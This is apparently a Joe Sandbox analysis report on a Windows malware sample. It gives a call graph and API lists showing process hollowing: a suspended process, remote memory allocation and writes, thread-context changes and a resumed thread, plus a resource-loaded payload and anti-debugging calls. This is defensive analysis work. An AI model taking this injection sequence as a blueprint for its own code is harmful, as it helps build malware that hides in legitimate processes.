3348 ba4e7c _free 66 API calls 3347->3348 3349 ba5f96 3348->3349 3350 ba4e7c _free 66 API calls 3349->3350 3351 ba5fa1 3350->3351 3352 ba4e7c _free 66 API calls 3351->3352 3353 ba5fac 3352->3353 3354 ba4e7c _free 66 API calls 3353->3354 3355 ba5fb7 3354->3355 3356 ba4e7c _free 66 API calls 3355->3356 3357 ba5fc2 3356->3357 3358 ba4e7c _free 66 API calls 3357->3358 3359 ba5fcd 3358->3359 3360 ba4e7c _free 66 API calls 3359->3360 3361 ba5fd8 3360->3361 3362 ba4e7c _free 66 API calls 3361->3362 3363 ba5fe3 3362->3363 3364 ba4e7c _free 66 API calls 3363->3364 3365 ba5ff1 3364->3365 3366 ba4e7c _free 66 API calls 3365->3366 3367 ba5ffc 3366->3367 3368 ba4e7c _free 66 API calls 3367->3368 3369 ba6007 3368->3369 3370 ba4e7c _free 66 API calls 3369->3370 3371 ba6012 3370->3371 3372 ba4e7c _free 66 API calls 3371->3372 3373 ba601d 3372->3373 3374 ba4e7c _free 66 API calls 3373->3374 3375 ba6028 3374->3375 3376 ba4e7c _free 66 API calls 3375->3376 3377 ba6033 3376->3377 3378 ba4e7c _free 66 API calls 3377->3378 3379 ba603e 3378->3379 3380 ba4e7c _free 66 API calls 3379->3380 3381 ba6049 3380->3381 3382 ba4e7c _free 66 API calls 3381->3382 3383 ba6054 3382->3383 3384 ba4e7c _free 66 API calls 3383->3384 3385 ba605f 3384->3385 3386 ba4e7c _free 66 API calls 3385->3386 3387 ba606a 3386->3387 3388 ba4e7c _free 66 API calls 3387->3388 3389 ba6075 3388->3389 3390 ba4e7c _free 66 API calls 3389->3390 3391 ba6080 3390->3391 3392 ba4e7c _free 66 API calls 3391->3392 3393 ba608b 3392->3393 3394 ba4e7c _free 66 API calls 3393->3394 3395 ba6096 3394->3395 3396 ba4e7c _free 66 API calls 3395->3396 3397 ba60a4 3396->3397 3398 ba4e7c _free 66 API calls 3397->3398 3399 ba60af 3398->3399 3400 ba4e7c _free 66 API calls 3399->3400 3401 ba60ba 3400->3401 3402 ba4e7c _free 66 API calls 3401->3402 3403 ba60c5 3402->3403 3404 ba4e7c _free 66 API calls 3403->3404 3405 ba60d0 3404->3405 3406 ba4e7c _free 66 API calls 3405->3406 3407 ba60db 3406->3407 3408 ba4e7c _free 66 API calls 3407->3408 3409 ba60e6 3408->3409 3410 ba4e7c _free 66 API calls 3409->3410 3411 ba60f1 3410->3411 3412 ba4e7c _free 66 API calls 3411->3412 3413 ba60fc 3412->3413 3414 ba4e7c _free 66 API calls 3413->3414 3415 ba6107 3414->3415 3416 ba4e7c _free 66 API calls 3415->3416 3417 ba6112 3416->3417 3418 ba4e7c _free 66 API calls 3417->3418 3419 ba611d 3418->3419 3420 ba4e7c _free 66 API calls 3419->3420 3421 ba6128 3420->3421 3422 ba4e7c _free 66 API calls 3421->3422 3423 ba6133 3422->3423 3424 ba4e7c _free 66 API calls 3423->3424 3425 ba613e 3424->3425 3426 ba4e7c _free 66 API calls 3425->3426 3427 ba6149 3426->3427 3428 ba4e7c _free 66 API calls 3427->3428 3429 ba6157 3428->3429 3430 ba4e7c _free 66 API calls 3429->3430 3431 ba6162 3430->3431 3432 ba4e7c _free 66 API calls 3431->3432 3433 ba616d 3432->3433 3434 ba4e7c _free 66 API calls 3433->3434 3435 ba6178 3434->3435 3436 ba4e7c _free 66 API calls 3435->3436 3437 ba6183 3436->3437 3438 ba4e7c _free 66 API calls 3437->3438 3438->3267 3439->3180 3441 ba4913 3440->3441 3443 ba485f _memset 3440->3443 3445 ba229a __crtGetStringTypeA_stat 5 API calls 3441->3445 3450 ba5c1a 3443->3450 3447 ba49b9 3445->3447 3447->3139 3449 ba5aed ___crtLCMapStringA 82 API calls 3449->3441 3451 ba46a6 _LocaleUpdate::_LocaleUpdate 76 API calls 3450->3451 3452 ba5c2d 3451->3452 3460 ba5b33 3452->3460 3455 ba5aed 3456 ba46a6 _LocaleUpdate::_LocaleUpdate 76 API calls 3455->3456 3457 ba5b00 3456->3457 3477 ba5906 3457->3477 3461 ba5b5c MultiByteToWideChar 3460->3461 3462 ba5b51 3460->3462 3465 ba5b89 3461->3465 3472 ba5b85 3461->3472 3462->3461 3463 ba5b9e _memset __alloca_probe_16 3468 ba5bd7 MultiByteToWideChar 3463->3468 3463->3472 3464 ba229a __crtGetStringTypeA_stat 5 API calls 3466 ba48ce 3464->3466 3465->3463 3467 ba5c5a _malloc 66 API calls 3465->3467 3466->3455 3467->3463 3469 ba5bfe 3468->3469 3470 ba5bed GetStringTypeW 3468->3470 3473 ba5821 3469->3473 3470->3469 3472->3464 3474 ba582d 3473->3474 3476 ba583e 3473->3476 3475 ba4e7c _free 66 API calls 3474->3475 3474->3476 3475->3476 3476->3472 3479 ba5924 MultiByteToWideChar 3477->3479 3480 ba5982 3479->3480 3485 ba5989 3479->3485 3481 ba229a __crtGetStringTypeA_stat 5 API calls 3480->3481 3483 ba48ee 3481->3483 3482 ba59d6 MultiByteToWideChar 3486 ba59ef LCMapStringW 3482->3486 3500 ba5ace 3482->3500 3483->3449 3484 ba59a2 __alloca_probe_16 3484->3480 3484->3482 3485->3484 3487 ba5c5a _malloc 66 API calls 3485->3487 3488 ba5a0e 3486->3488 3486->3500 3487->3484 3490 ba5a18 3488->3490 3493 ba5a41 3488->3493 3489 ba5821 __freea 66 API calls 3489->3480 3491 ba5a2c LCMapStringW 3490->3491 3490->3500 3491->3500 3492 ba5a90 LCMapStringW 3495 ba5ac8 3492->3495 3496 ba5aa6 WideCharToMultiByte 3492->3496 3494 ba5c5a _malloc 66 API calls 3493->3494 3497 ba5a5c __alloca_probe_16 3493->3497 3494->3497 3498 ba5821 __freea 66 API calls 3495->3498 3496->3495 3497->3492 3497->3500 3498->3500 3500->3489 3501->3142 3505 ba3f39 DecodePointer 3502->3505 3506 ba3f4e 3505->3506 3507 ba3f14 __invoke_watson 10 API calls 3506->3507 3508 ba3f65 3507->3508 3509 ba3f39 _strcpy_s 10 API calls 3508->3509 3510 ba3f72 3509->3510 3510->3066 3512 ba46a6 _LocaleUpdate::_LocaleUpdate 76 API calls 3511->3512 3513 ba4740 3512->3513 3513->2762 3515 ba4142 EncodePointer 3514->3515 3515->3515 3516 ba415c 3515->3516 3516->2769 3520 ba40e9 3517->3520 3519 ba4132 3519->2771 3521 ba40f5 __setmbcp 3520->3521 3528 ba25e2 3521->3528 3527 ba4116 __setmbcp 3527->3519 3529 ba3b86 __lock 66 API calls 3528->3529 3530 ba25e9 3529->3530 3531 ba4002 DecodePointer DecodePointer 3530->3531 3532 ba4030 3531->3532 3533 ba40b1 3531->3533 3532->3533 3545 ba58ca 3532->3545 3542 ba411f 3533->3542 3535 ba4094 EncodePointer EncodePointer 3535->3533 3536 ba4066 3536->3533 3539 ba4fa6 __realloc_crt 70 API calls 3536->3539 3540 ba4082 EncodePointer 3536->3540 3537 ba4042 3537->3535 3537->3536 3552 ba4fa6 3537->3552 3541 ba407c 3539->3541 3540->3535 3541->3533 3541->3540 3578 ba25eb 3542->3578 3546 ba58ea HeapSize 3545->3546 3547 ba58d5 3545->3547 3546->3537 3548 ba3fef _malloc 66 API calls 3547->3548 3549 ba58da 3548->3549 3550 ba3f66 _strcpy_s 11 API calls 3549->3550 3551 ba58e5 3550->3551 3551->3537 3555 ba4faf 3552->3555 3554 ba4fee 3554->3536 3555->3554 3556 ba4fcf Sleep 3555->3556 3557 ba5d70 3555->3557 3556->3555 3558 ba5d7b 3557->3558 3559 ba5d86 3557->3559 3560 ba5c5a _malloc 66 API calls 3558->3560 3561 ba5d8e 3559->3561 3569 ba5d9b 3559->3569 3563 ba5d83 3560->3563 3562 ba4e7c _free 66 API calls 3561->3562 3577 ba5d96 _free 3562->3577 3563->3555 3564 ba5dd3 3566 ba3f85 _malloc DecodePointer 3564->3566 3565 ba5da3 HeapReAlloc 3565->3569 3565->3577 3567 ba5dd9 3566->3567 3570 ba3fef _malloc 66 API calls 3567->3570 3568 ba5e03 3572 ba3fef _malloc 66 API calls 3568->3572 3569->3564 3569->3565 3569->3568 3571 ba3f85 _malloc DecodePointer 3569->3571 3574 ba5deb 3569->3574 3570->3577 3571->3569 3573 ba5e08 GetLastError 3572->3573 3573->3577 3575 ba3fef _malloc 66 API calls 3574->3575 3576 ba5df0 GetLastError 3575->3576 3576->3577 3577->3555 3581 ba3aad LeaveCriticalSection 3578->3581 3580 ba25f2 3580->3527 3581->3580 3583 ba1ca2 3582->3583 3601 ba1de4 3582->3601 3585 ba1cc0 3583->3585 3586 ba1d86 3583->3586 3583->3601 3584 ba229a __crtGetStringTypeA_stat 5 API calls 3587 ba1dff 3584->3587 3588 ba1cc9 3585->3588 3589 ba1d32 3585->3589 3592 ba1d97 3586->3592 3599 ba1dba 3586->3599 3586->3601 3587->2780 3590 ba1cee 3588->3590 3591 ba1cd1 3588->3591 3593 ba1d43 3589->3593 3594 ba1d60 3589->3594 3589->3601 3596 ba1d0d 3590->3596 3597 ba1cf3 3590->3597 3595 ba229a __crtGetStringTypeA_stat 5 API calls 3591->3595 3598 ba1d9d 3592->3598 3592->3601 3602 ba229a __crtGetStringTypeA_stat 5 API calls 3593->3602 3594->3601 3603 ba1d69 3594->3603 3604 ba1ce7 3595->3604 3596->3601 3606 ba1d15 3596->3606 3605 ba229a __crtGetStringTypeA_stat 5 API calls 3597->3605 3607 ba229a __crtGetStringTypeA_stat 5 API calls 3598->3607 3600 ba1dc7 3599->3600 3599->3601 3608 ba229a __crtGetStringTypeA_stat 5 API calls 3600->3608 3601->3584 3609 ba1d59 3602->3609 3610 ba229a __crtGetStringTypeA_stat 5 API calls 3603->3610 3604->2780 3611 ba1d06 3605->3611 3612 ba229a __crtGetStringTypeA_stat 5 API calls 3606->3612 3613 ba1db3 3607->3613 3614 ba1ddd 3608->3614 3609->2780 3615 ba1d7f 3610->3615 3611->2780 3616 ba1d2b 3612->3616 3613->2780 3614->2780 3615->2780 3616->2780 3618 ba1c70 6 API calls 3617->3618 3619 ba2123 3618->3619 3620 ba2128 MessageBoxIndirectA MessageBoxExA EndDialog SendDlgItemMessageA ExitProcess 3619->3620 3621 ba2162 KiUserCallbackDispatcher 3619->3621 3622 ba225e 3621->3622 3623 ba2244 3621->3623 3625 ba229a __crtGetStringTypeA_stat 5 API calls 3622->3625 3631 ba10f0 3623->3631 3627 ba226e 3625->3627 3627->2714 3627->2836 3629 ba2259 3645 ba1950 3629->3645 3665 ba1000 GetPEB 3631->3665 3633 ba114c 3634 ba229a __crtGetStringTypeA_stat 5 API calls 3633->3634 3635 ba1195 Sleep 3634->3635 3636 ba1e10 3635->3636 3637 ba1f70 13 API calls 3636->3637 3639 ba20e1 RtlDestroyQueryDebugBuffer 3637->3639 3640 ba20b6 OutputDebugStringA Sleep 3637->3640 3642 ba229a __crtGetStringTypeA_stat 5 API calls 3639->3642 3641 ba229a __crtGetStringTypeA_stat 5 API calls 3640->3641 3644 ba20da 3641->3644 3643 ba20fa 3642->3643 3643->3629 3644->3629 3646 ba1a90 3645->3646 3646->3646 3647 ba1aab LoadLibraryExA GetProcAddress 3646->3647 3648 ba1ad0 3647->3648 3648->3648 3649 ba1adb LoadLibraryExA GetProcAddress 3648->3649 3650 ba1b00 3649->3650 3650->3650 3651 ba1b0b LoadLibraryExA GetProcAddress 3650->3651 3652 ba1b30 3651->3652 3652->3652 3653 ba1b3b LoadLibraryExA GetProcAddress 3652->3653 3654 ba1b60 3653->3654 3654->3654 3655 ba1b6b LoadLibraryExA GetProcAddress 3654->3655 3656 ba1b90 3655->3656 3656->3656 3657 ba1b9b 8 API calls 3656->3657 3658 ba1c00 3657->3658 3658->3658 3659 ba1c0e LoadLibraryExA GetProcAddress 3658->3659 3660 ba1c42 3659->3660 3666 ba11a0 3660->3666 3665->3633 3667 ba11c5 3666->3667 3667->3667 3668 ba229a __crtGetStringTypeA_stat 5 API calls 3667->3668 3669 ba12f3 3668->3669 3670 ba1300 Sleep 3669->3670 3671 ba18f6 LoadLibraryExA GetProcAddress VirtualFree 3670->3671 3674 ba155f 3670->3674 3673 ba229a __crtGetStringTypeA_stat 5 API calls 3671->3673 3675 ba1944 ExitProcess 3673->3675 3674->3671 3676 ba159b LoadLibraryExA GetProcAddress 3674->3676 3699 ba5850 3676->3699 3679 ba15fe LoadLibraryExA GetProcAddress VirtualAlloc 3681 ba1650 3679->3681 3681->3681 3682 ba165e LoadLibraryExA GetProcAddress Wow64GetThreadContext 3681->3682 3682->3671 3683 ba168f LoadLibraryExA GetProcAddress ReadProcessMemory 3682->3683 3685 ba174a LoadLibraryExA GetProcAddress VirtualAllocEx 3683->3685 3686 ba16e3 LoadLibraryExA GetProcAddress 3683->3686 3685->3671 3689 ba17a3 LoadLibraryExA GetProcAddress WriteProcessMemory 3685->3689 3686->3685 3691 ba1802 3689->3691 3692 ba1850 WriteProcessMemory 3689->3692 3693 ba1810 WriteProcessMemory 3691->3693 3694 ba1882 3692->3694 3693->3693 3695 ba184c 3693->3695 3694->3694 3696 ba1890 LoadLibraryExA GetProcAddress Wow64SetThreadContext 3694->3696 3695->3692 3697 ba18c0 3696->3697 3697->3697 3698 ba18ce LoadLibraryExA GetProcAddress ResumeThread 3697->3698 3698->3671 3700 ba15cc CreateProcessA 3699->3700 3700->3671 3700->3679 3702 ba32ec DecodePointer 3701->3702 3703 ba32fb 3701->3703 3702->3703 3704 ba330c TlsFree 3703->3704 3705 ba331a 3703->3705 3704->3705 3706 ba3a72 DeleteCriticalSection 3705->3706 3707 ba3a8a 3705->3707 3708 ba4e7c _free 66 API calls 3706->3708 3709 ba3a9c DeleteCriticalSection 3707->3709 3710 ba35ae 3707->3710 3708->3705 3709->3707 3710->2678 3720 ba329c EncodePointer 3711->3720 3713 ba25fc __init_pointers __initp_misc_winsig 3721 ba39fb EncodePointer 3713->3721 3715 ba2622 EncodePointer EncodePointer EncodePointer EncodePointer 3716 ba3a0c 3715->3716 3717 ba3a17 3716->3717 3718 ba3a21 InitializeCriticalSectionAndSpinCount 3717->3718 3719 ba369f 3717->3719 3718->3717 3718->3719 3719->2807 3719->2808 3720->3713 3721->3715 3725 ba26e2 3722->3725 3724 ba2849 3726 ba26ee __setmbcp 3725->3726 3727 ba3b86 __lock 61 API calls 3726->3727 3728 ba26f5 3727->3728 3730 ba2720 DecodePointer 3728->3730 3735 ba279f 3728->3735 3732 ba2737 DecodePointer 3730->3732 3730->3735 3740 ba274a 3732->3740 3733 ba281c __setmbcp 3733->3724 3748 ba280d 3735->3748 3736 ba2804 3738 ba25ca _malloc 3 API calls 3736->3738 3739 ba280d 3738->3739 3744 ba281a 3739->3744 3753 ba3aad LeaveCriticalSection 3739->3753 3740->3735 3741 ba2761 DecodePointer 3740->3741 3745 ba2770 DecodePointer DecodePointer 3740->3745 3746 ba329c EncodePointer 3740->3746 3747 ba329c EncodePointer 3741->3747 3744->3724 3745->3740 3746->3740 3747->3740 3749 ba27ed 3748->3749 3750 ba2813 3748->3750 3749->3733 3752 ba3aad LeaveCriticalSection 3749->3752 3754 ba3aad LeaveCriticalSection 3750->3754 3752->3736 3753->3744 3754->3749 3757 ba2d3c 3755->3757 3756 ba4780 _parse_cmdline 76 API calls 3756->3757 3757->3756 3758 ba2da9 3757->3758 3759 ba2ea7 3758->3759 3760 ba4780 76 API calls _parse_cmdline 3758->3760 3759->2832 3759->2835 3760->3758 3910 ba3790 3911 ba37c9 3910->3911 3912 ba37bc 3910->3912 3914 ba229a __crtGetStringTypeA_stat 5 API calls 3911->3914 3913 ba229a __crtGetStringTypeA_stat 5 API calls 3912->3913 3913->3911 3915 ba37d9 __except_handler4 __IsNonwritableInCurrentImage 3914->3915 3916 ba385c 3915->3916 3917 ba3832 __except_handler4 3915->3917 3926 ba5452 RtlUnwind 3915->3926 3917->3916 3918 ba384c 3917->3918 3919 ba229a __crtGetStringTypeA_stat 5 API calls 3917->3919 3920 ba229a __crtGetStringTypeA_stat 5 API calls 3918->3920 3919->3918 3920->3916 3922 ba38ae __except_handler4 3923 ba38e2 3922->3923 3924 ba229a __crtGetStringTypeA_stat 5 API calls 3922->3924 3925 ba229a __crtGetStringTypeA_stat 5 API calls 3923->3925 3924->3923 3925->3917 3926->3922 3927 ba2415 3928 ba242a 3927->3928 3929 ba2424 3927->3929 3931 ba242f __setmbcp 3928->3931 3933 ba285d 3928->3933 3930 ba2838 __amsg_exit 66 API calls 3929->3930 3930->3928 3934 ba26e2 _doexit 66 API calls 3933->3934 3935 ba2868 3934->3935 3935->3931 3936 ba254f 3937 ba258b 3936->3937 3938 ba2561 3936->3938 3938->3937 3940 ba39c2 3938->3940 3941 ba39ce __setmbcp 3940->3941 3942 ba344c __getptd 66 API calls 3941->3942 3943 ba39d3 3942->3943 3944 ba5482 _abort 68 API calls 3943->3944 3945 ba39f5 __setmbcp 3944->3945 3945->3937 3946 ba53c0 3947 ba53d2 3946->3947 3949 ba53e0 @_EH4_CallFilterFunc@8 3946->3949 3948 ba229a __crtGetStringTypeA_stat 5 API calls 3947->3948 3948->3949 3950 ba6300 RtlUnwind 3951 ba2401 3954 ba2a98 3951->3954 3955 ba33d3 __getptd_noexit 66 API calls 3954->3955 3956 ba2412 3955->3956 3761 ba1806 3762 ba1810 WriteProcessMemory 3761->3762 3762->3762 3763 ba184c WriteProcessMemory 3762->3763 3765 ba1882 3763->3765 3765->3765 3766 ba1890 LoadLibraryExA GetProcAddress Wow64SetThreadContext 3765->3766 3767 ba18c0 3766->3767 3767->3767 3768 ba18ce LoadLibraryExA GetProcAddress ResumeThread 3767->3768 3769 ba18f6 LoadLibraryExA GetProcAddress VirtualFree 3768->3769 3771 ba229a __crtGetStringTypeA_stat 5 API calls 3769->3771 3772 ba1944 3771->3772 3792 ba39e6 3793 ba39e9 3792->3793 3796 ba5482 3793->3796 3795 ba39f5 __setmbcp 3805 ba3c0e DecodePointer 3796->3805 3798 ba5487 3799 ba5492 3798->3799 3806 ba3c1b 3798->3806 3801 ba54aa 3799->3801 3827 ba3deb 3799->3827 3803 ba2838 __amsg_exit 66 API calls 3801->3803 3804 ba54b4 3803->3804 3804->3795 3805->3798 3807 ba3c27 __setmbcp 3806->3807 3808 ba3c4e 3807->3808 3809 ba3c82 3807->3809 3810 ba3c64 DecodePointer 3807->3810 3816 ba3c4a 3807->3816 3811 ba33d3 __getptd_noexit 66 API calls 3808->3811 3809->3810 3813 ba3c91 3809->3813 3814 ba3c53 _siglookup 3810->3814 3811->3814 3815 ba3fef _malloc 66 API calls 3813->3815 3818 ba3cee 3814->3818 3819 ba2838 __amsg_exit 66 API calls 3814->3819 3826 ba3c5c __setmbcp 3814->3826 3817 ba3c96 3815->3817 3816->3808 3816->3813 3820 ba3f66 _strcpy_s 11 API calls 3817->3820 3821 ba3b86 __lock 66 API calls 3818->3821 3822 ba3cf9 3818->3822 3819->3818 3820->3826 3821->3822 3824 ba3d2e 3822->3824 3833 ba329c EncodePointer 3822->3833 3834 ba3d82 3824->3834 3826->3799 3828 ba3e0a _memset __call_reportfault 3827->3828 3829 ba3e28 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 3828->3829 3830 ba3ef6 __call_reportfault 3829->3830 3831 ba229a __crtGetStringTypeA_stat 5 API calls 3830->3831 3832 ba3f12 3831->3832 3832->3801 3833->3824 3835 ba3d88 3834->3835 3836 ba3d8f 3834->3836 3838 ba3aad LeaveCriticalSection 3835->3838 3836->3826 3838->3836 3839 ba3466 3841 ba3472 __setmbcp 3839->3841 3840 ba348a 3844 ba3498 3840->3844 3845 ba4e7c _free 66 API calls 3840->3845 3841->3840 3842 ba3574 __setmbcp 3841->3842 3843 ba4e7c _free 66 API calls 3841->3843 3843->3840 3846 ba34a6 3844->3846 3847 ba4e7c _free 66 API calls 3844->3847 3845->3844 3848 ba34b4 3846->3848 3849 ba4e7c _free 66 API calls 3846->3849 3847->3846 3850 ba34c2 3848->3850 3851 ba4e7c _free 66 API calls 3848->3851 3849->3848 3852 ba34d0 3850->3852 3853 ba4e7c _free 66 API calls 3850->3853 3851->3850 3854 ba34de 3852->3854 3855 ba4e7c _free 66 API calls 3852->3855 3853->3852 3856 ba34ef 3854->3856 3857 ba4e7c _free 66 API calls 3854->3857 3855->3854 3858 ba3b86 __lock 66 API calls 3856->3858 3857->3856 3859 ba34f7 3858->3859 3860 ba3503 InterlockedDecrement 3859->3860 3867 ba351c 3859->3867 3861 ba350e 3860->3861 3860->3867 3865 ba4e7c _free 66 API calls 3861->3865 3861->3867 3864 ba3b86 __lock 66 API calls 3866 ba3530 3864->3866 3865->3867 3868 ba3561 3866->3868 3869 ba5086 ___removelocaleref 8 API calls 3866->3869 3875 ba3580 3867->3875 3878 ba358c 3868->3878 3873 ba3545 3869->3873 3872 ba4e7c _free 66 API calls 3872->3842 3873->3868 3874 ba511f ___freetlocinfo 66 API calls 3873->3874 3874->3868 3881 ba3aad LeaveCriticalSection 3875->3881 3877 ba3529 3877->3864 3882 ba3aad LeaveCriticalSection 3878->3882 3880 ba356e 3880->3872 3881->3877 3882->3880 3883 ba4666 3884 ba4673 3883->3884 3885 ba3fef _malloc 66 API calls 3884->3885 3886 ba467d 3884->3886 3887 ba4696 3885->3887 3888 ba3f66 _strcpy_s 11 API calls 3887->3888 3889 ba46a1 3888->3889 3890 ba17a7 3891 ba17b0 3890->3891 3891->3891 3892 ba17be LoadLibraryExA GetProcAddress WriteProcessMemory 3891->3892 3893 ba1802 3892->3893 3894 ba1850 WriteProcessMemory 3892->3894 3895 ba1810 WriteProcessMemory 3893->3895 3896 ba1882 3894->3896 3895->3895 3897 ba184c 3895->3897 3896->3896 3898 ba1890 LoadLibraryExA GetProcAddress Wow64SetThreadContext 3896->3898 3897->3894 3899 ba18c0 3898->3899 3899->3899 3900 ba18ce LoadLibraryExA GetProcAddress ResumeThread 3899->3900 3901 ba18f6 3900->3901 3901->3901 3902 ba190e LoadLibraryExA GetProcAddress VirtualFree 3901->3902 3903 ba229a __crtGetStringTypeA_stat 5 API calls 3902->3903 3904 ba1944 3903->3904 3905 ba32a5 TlsAlloc

                                        Control-flow Graph

                                        APIs
                                        • Sleep.KERNELBASE ref: 00BA154B
                                        • LoadLibraryExA.KERNELBASE(?,00000000,00000000), ref: 00BA15AF
                                        • GetProcAddress.KERNELBASE(00000000), ref: 00BA15B6
                                        • _memset.LIBCMT ref: 00BA15C7
                                        • CreateProcessA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?,00000001), ref: 00BA15F4
                                        • LoadLibraryExA.KERNELBASE(?,00000000,00000000), ref: 00BA1622
                                        • GetProcAddress.KERNELBASE(00000000), ref: 00BA1629
                                        • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 00BA163A
                                        • LoadLibraryExA.KERNELBASE(?,00000000,00000000), ref: 00BA1672
                                        • GetProcAddress.KERNELBASE(00000000), ref: 00BA1679
                                        • Wow64GetThreadContext.KERNEL32(00000004,00000000), ref: 00BA1685
                                        • LoadLibraryExA.KERNELBASE(?,00000000,00000000), ref: 00BA16B3
                                        • GetProcAddress.KERNELBASE(00000000), ref: 00BA16BA
                                        • ReadProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 00BA16D8
                                        • LoadLibraryExA.KERNELBASE(?,00000000,00000000), ref: 00BA1731
                                        • GetProcAddress.KERNELBASE(00000000), ref: 00BA1738
                                        • LoadLibraryExA.KERNELBASE(?,00000000,00000000), ref: 00BA1772
                                        • GetProcAddress.KERNELBASE(00000000), ref: 00BA1779
                                        • VirtualAllocEx.KERNELBASE(00000000,?,?,00003000,00000040), ref: 00BA1793
                                        • LoadLibraryExA.KERNELBASE(?,00000000,00000000), ref: 00BA17D2
                                        • GetProcAddress.KERNELBASE(00000000), ref: 00BA17D9
                                        • WriteProcessMemory.KERNELBASE(00000000,00000000,?,?,00000000), ref: 00BA17F2
                                        • WriteProcessMemory.KERNELBASE(00000000,?,?,?,00000000,?,?,00000000), ref: 00BA183A
                                        • WriteProcessMemory.KERNELBASE(00000000,?,-00000034,00000004,00000000,?,?,00000000), ref: 00BA186F
                                        • LoadLibraryExA.KERNELBASE(D5C9DED0,00000000,00000000), ref: 00BA191F
                                        • GetProcAddress.KERNELBASE(00000000), ref: 00BA1926
                                        • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 00BA1934
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1705310735.0000000000BA1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                        • Associated: 00000000.00000002.1705295948.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1705323652.0000000000BA7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1705993561.0000000000BA8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1706428602.0000000000BA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1706711305.0000000000BC2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1706752612.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ba0000_a5gvJhukP7.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AddressLibraryLoadProc$Process$Memory$VirtualWrite$Alloc$ContextCreateFreeReadSleepThreadWow64_memset
                                        • String ID:
                                        • API String ID: 2577535249-0
                                        • Opcode ID: a8ea3fffbd8f418fa5563d626ffa3f5dfd94b2399b8c9e327fae9d3a53a859e0
                                        • Instruction ID: 4e9a6018346844a14b8d0a9099cbd52ff623d9589c88e49d0e08fd4f682323ea
                                        • Opcode Fuzzy Hash: a8ea3fffbd8f418fa5563d626ffa3f5dfd94b2399b8c9e327fae9d3a53a859e0
                                        • Instruction Fuzzy Hash: EBF13CB11083819FD370DB68C849B9BBBE8BB89310F508E5CE2D98B291DB749445CB67

                                        Control-flow Graph

                                        APIs
                                        • LoadLibraryExA.KERNELBASE(?,00000000,00000000), ref: 00BA1AB9
                                        • GetProcAddress.KERNELBASE(00000000), ref: 00BA1AC0
                                        • LoadLibraryExA.KERNELBASE(?,00000000,00000000), ref: 00BA1AE9
                                        • GetProcAddress.KERNELBASE(00000000), ref: 00BA1AF0
                                        • LoadLibraryExA.KERNELBASE(?,00000000,00000000), ref: 00BA1B19
                                        • GetProcAddress.KERNELBASE(00000000), ref: 00BA1B20
                                        • LoadLibraryExA.KERNELBASE(?,00000000,00000000), ref: 00BA1B49
                                        • GetProcAddress.KERNELBASE(00000000), ref: 00BA1B50
                                        • LoadLibraryExA.KERNELBASE(?,00000000,00000000), ref: 00BA1B79
                                        • GetProcAddress.KERNELBASE(00000000), ref: 00BA1B80
                                        • LoadLibraryExA.KERNELBASE(?,00000000,00000000), ref: 00BA1BA9
                                        • GetProcAddress.KERNELBASE(00000000), ref: 00BA1BB0
                                        • GetModuleHandleA.KERNEL32(00000000), ref: 00BA1BBD
                                        • FindResourceA.KERNEL32(00000000,0000004E,00000005), ref: 00BA1BCA
                                        • LoadResource.KERNEL32(00000000,00000000), ref: 00BA1BD4
                                        • LockResource.KERNEL32(00000000), ref: 00BA1BDB
                                        • SizeofResource.KERNEL32(00000000,00000000), ref: 00BA1BE5
                                        • SizeofResource.KERNEL32(00000000,00000000), ref: 00BA1BEE
                                        • LoadLibraryExA.KERNELBASE(?,00000000,00000000), ref: 00BA1C1F
                                        • GetProcAddress.KERNELBASE(00000000), ref: 00BA1C26
                                        • ExitProcess.KERNEL32 ref: 00BA1C65
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1705310735.0000000000BA1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                        • Associated: 00000000.00000002.1705295948.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1705323652.0000000000BA7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1705993561.0000000000BA8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1706428602.0000000000BA9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1706711305.0000000000BC2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1706752612.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_ba0000_a5gvJhukP7.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Load$AddressLibraryProc$Resource$Sizeof$ExitFindHandleLockModuleProcess
                                        • String ID: 123
                                        • API String ID: 2491338506-2286445522
                                        • Opcode ID: dd98f24847f98b249f68a0c795ad83ba045eb5a9c482b99a45026a71b9d38763
                                        • Instruction ID: aa6c5128856587f465c750fc678057946fec1bdbf99077228d82e2524a0332e2
                                        • Opcode Fuzzy Hash: dd98f24847f98b249f68a0c795ad83ba045eb5a9c482b99a45026a71b9d38763
                                        • Instruction Fuzzy Hash: 1E8119B10183809FD351DF64D859B5BBBE8FB9A304F504E4DF2968B2A1EB749405CB63

                                        Control-flow Graph

                                        APIs
                                        • LoadLibraryExA.KERNELBASE(?,00000000,00000000), ref: 00BA1FF9
                                        • GetProcAddress.KERNELBASE(00000000), ref: 00BA2000
                                        • LoadLibraryExA.KERNELBASE(?,00000000,00000000), ref: 00BA2019
                                        • GetProcAddress.KERNELBASE(00000000), ref: 00BA2020
                                        • LoadLibraryExA.KERNELBASE(000000BB,00000000,00000000), ref: 00BA2039
